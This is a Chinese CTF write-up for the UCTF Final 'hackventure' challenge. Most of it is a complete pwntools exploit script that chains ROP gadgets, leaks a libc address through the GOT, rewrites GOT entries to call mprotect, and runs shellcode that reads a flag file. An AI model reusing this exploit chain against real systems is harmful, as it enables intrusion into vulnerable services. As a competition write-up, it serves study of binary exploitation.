UCTF Final-Hackventure

  抽出世间将UCTF Final中的hackventure给记录下,算是个总结。题目是有一个游戏,游戏地图是随机生成的,用户可以攻打Server,如果3个Server都被攻占的话,那么用户就赢了,但是并没有Flag。

  题目以及IDB见:http://files.cnblogs.com/files/wangaohui/hackventure-blog.zip

  题目是一个C++的题目,结构体也不少,把结构体都建立后,逆起来轻松不少。把题目逆了一遍后,首先发现的是个整数溢出,然而并不知道怎么利用。其次发现的还有对空指针进行解引用造成的崩溃,以及free后全局变量区指针并没有清零等。但是这些都不知道怎么利用。后来发现一个栈溢出,而且溢出的空间很大,完全可以来做ROP,在程序本身的_libc_csu_init里有好用的通用Gadget。

  漏洞位置:

EXP:

import sys
from pwn import *
#context.log_level='debug'
#by wah

exe = 'hackventure'
ip = '127.0.0.1'
port = 10001
#ip = '10.250.100.12'
#port = 6666

me = [0,0]
home = [0,0]
store = [0,0]
server = [[0,0],[0,0],[0,0]] 

#100 10.10.10.1
#200 10.1.11.1
server100 = [0,0]
server200 = [0,0]
server300 = [0,0]

def getpid():
    time.sleep(0.1)
    pid= pwnlib.util.proc.pidof(exe)
    print pid
    raw_input('go!')
def walk(f,t):
    if f==t:
        return
    global r
    x= t[0]-f[0]
    y = t[1]-f[1]
    #print f,t
    #print x,y
    if x<0:
        for i in range(-x):
            r.sendline('go up')
    elif x>0:
        for i in range(x):
            r.sendline('go down')
    else:
        pass
    if y<0:
        for i in range(-y):
            r.sendline('go left')
    elif y>0:
        for i in range(y):
            r.sendline('go right')
    else:
        pass
        
def getinfo():
    global r,me,home,store,server,server100,server200,server300
    r.recvuntil('+--------------------------------+\n')
    matrix = r.recvuntil('\n+--------------------------------+\n')
    print matrix
    #print binascii.hexlify(matrix)
    sr = []
    for i in range(len(matrix)):
        if matrix[i] == 'T':
            s = i
        elif matrix[i] == 'S':
            sr.append(i)
        elif matrix[i] == 'H':
            h = i
        elif matrix[i] == '*':
            m = i
        else:
            pass
    me[1] = m%35
    me[0] = m/35+1
    
    home[1] = h%35
    home[0] = h/35+1

    store[1] = s%35
    store[0] = s/35+1

    server[0][1] = sr[0]%35
    server[0][0] = sr[0]/35+1

    server[1][1] = sr[1]%35
    server[1][0] = sr[1]/35+1

    server[2][1] = sr[2]%35
    server[2][0] = sr[2]/35+1

    walk(me,server[0])
    me = server[0]
    r.sendline('explore')
    r.recvuntil('IP: ')
    ip = r.recvuntil('\n').strip()
    #print ip
    r.recvuntil('HP: ')
    hp = r.recvuntil('\n').strip()
    if ip == '10.10.10.1':
        server100 = server[0]
    elif ip == '10.1.11.1':
        server200 = server[0]
    else:
        server300 = server[0]
    data = r.recvuntil('$ ')

    walk(me,server[1])
    me = server[1]
    r.sendline('explore')
    r.recvuntil('IP: ')
    ip = r.recvuntil('\n').strip()
    #print ip
    r.recvuntil('HP: ')
    hp = r.recvuntil('\n').strip()
    if ip == '10.10.10.1':
        server100 = server[1]
    elif ip == '10.1.11.1':
        server200 = server[1]
    else:
        server300 = server[1]
    data = r.recvuntil('$ ')

    walk(me,server[2])
    me = server[2]
    r.sendline('explore')
    r.recvuntil('IP: ')
    ip = r.recvuntil('\n').strip()
    #print ip
    r.recvuntil('HP: ')
    hp = r.recvuntil('\n').strip()
    if ip == '10.10.10.1':
        server100 = server[2]
    elif ip == '10.1.11.1':
        server200 = server[2]
    else:
        server300 = server[2]
    data = r.recvuntil('$ ')
    #print server100,server200,server300
def local_attack():
    r.sendline('local_attack')
def remote_attack(ip):
    r.sendline('remote_attack ' + ip)
def remote_attacks(ips):
    r.sendline('remote_attacks ' + ips)

r = remote(ip,port)
r.sendline('map')
getinfo()

walk(me,server100)
me=server100

local_attack()
local_attack()
r.recvuntil('You have compromised server 10.10.10.1, good job!\n')
r.sendline('5')
r.recvuntil('Name? ')
r.sendline('wah')
#remote_attack('10.1.11.1')

r.sendline('status')
r.recvuntil('*** Hacker\'s Profile ***')
r.recvuntil('$ ')

walk(me,home)
me=home

r.sendline('goodnight')
walk(me,server100)
me=server100
getpid()

sc = '''call a;
a:pop rcx;
add rcx,35
push rcx
ret
.string "/home/flag/hackventure/flag";
lea rdi,[rcx-28];
mov rax,2;
mov rsi,0;
syscall;
mov rdi,rax;
xor rax,rax;
mov rsi,0x605200;
mov rdx,16;
syscall;
mov rdi,1;
mov rsi,0x605200;
mov rdx,16;
mov rax,1;
syscall;
mov rax,60;
xor rdi,rdi;
syscall;'''
shellcode=asm(sc,arch='amd64',os='linux')

fakeebp = 0xaaaaaaaaaaaaaaaa
pop_rdi_ret = 0x4029F3
pop_rsi_r15_ret = 0x4029F1
atoi_got = 0x604098
puts_plt = 0x400840
call_getstring = 0x4014BC
#buf_to_store_mprotect = 0x604600
buf_to_store_mprotect_gets = 0x6040A0
buflen = 18
rubbish = 0xaaaaaaaa
pop_rbx_rbp_r12_r13_r14_r15_ret = 0x4029EA
call_mprotect = 0x4029D0
memo_to_exec = 0x604000
memo_len = 0x3000
memo_prot = 0x7
shellcode_addr = 0x605000
shellcode_len = 0x1000
plt_jmp_gets = 0x400940

rop = ''
rop += p64(pop_rdi_ret)
rop += p64(atoi_got)
rop += p64(puts_plt)

rop += p64(pop_rdi_ret)
rop += p64(buf_to_store_mprotect_gets)
rop += p64(pop_rsi_r15_ret)
rop += p64(buflen)
rop += p64(rubbish)
rop += p64(call_getstring)
rop += 'a'*0x68

rop += p64(pop_rbx_rbp_r12_r13_r14_r15_ret)
rop += p64(0)
rop += p64(1)
rop += p64(buf_to_store_mprotect_gets)
rop += p64(memo_prot)
rop += p64(memo_len)
rop += p64(memo_to_exec)
rop += p64(call_mprotect)

rop += p64(rubbish)
rop += p64(0)#rbx
rop += p64(0)#rbp
rop += p64(0)#r12
rop += p64(0)#r13
rop += p64(0)#r14
rop += p64(0)#r15
rop += p64(pop_rdi_ret)
rop += p64(shellcode_addr)
rop += p64(plt_jmp_gets)
rop += p64(shellcode_addr)

fuck1 = p64(fakeebp) + rop
remote_attacks('1,2,3,4,'+fuck1)
walk(me,server300)
local_attack()
local_attack()
local_attack()
local_attack()
local_attack()
r.recvuntil('Game Over!\n')
data = r.recvuntil('\n')[:-1]
atoi = u64(data + (8-len(data))*'\x00')
log.info("Leaked atoi: "+hex(atoi))

mprotect = atoi+0xbaa30 
gets = atoi +0x354d0
data = p64(mprotect) + p64(gets)
#overwrite got to mprotect and gets
r.sendline(data)
#write shellcode
r.sendline(shellcode)
r.recvuntil('Please own this server first.\n')
flag = r.recv(16)
print flag
r.close()
View Code

 

 

转载于:https://www.cnblogs.com/wangaohui/p/5800568.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值